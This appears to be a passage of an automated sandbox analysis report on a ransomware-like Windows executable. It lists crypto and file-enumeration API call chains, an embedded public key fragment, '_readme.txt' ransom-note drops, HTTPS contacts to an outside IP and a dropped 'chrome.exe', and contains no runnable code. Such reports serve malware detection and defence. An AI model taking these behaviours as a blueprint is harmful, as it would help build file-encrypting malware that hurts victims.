              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00F0EAA0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0EA51 CryptDestroyHash,CryptReleaseContext,4_2_00F0EA51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0EC68 CryptDestroyHash,CryptReleaseContext,4_2_00F0EC68
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F10FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,4_2_00F10FC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29E70
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Binary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\$WinREAgent\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\$WinREAgent\Scratch\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\Users\user\_readme.txt
              Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303570677.000000000394C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2306593926.000000000393F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2302847985.000000000394C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\\bi source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252822948.0000000003874000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\3 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Ap source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242070892.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241962914.0000000003368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\w source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvva source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ewy\\n D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313169253.0000000003979000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309346506.0000000003969000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\fnU source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvv source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B3B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ros source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\.pdb\a\Adobe source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313304101.0000000003C23000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\b source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261225726.0000000003986000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283524784.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\TempState\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003C26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\X source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\- source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.000000000396A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242783147.0000000003976000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253471637.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284103523.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291587000.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261492169.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290747950.00000000037C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.0000000003999000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242648733.0000000003999000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290353471.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B92000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221073589.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Snz source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220925314.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F20160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00F1FB98
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 2_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 2_2_00F20160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 2_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_00F1FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 3_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 3_2_00F10160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F10160
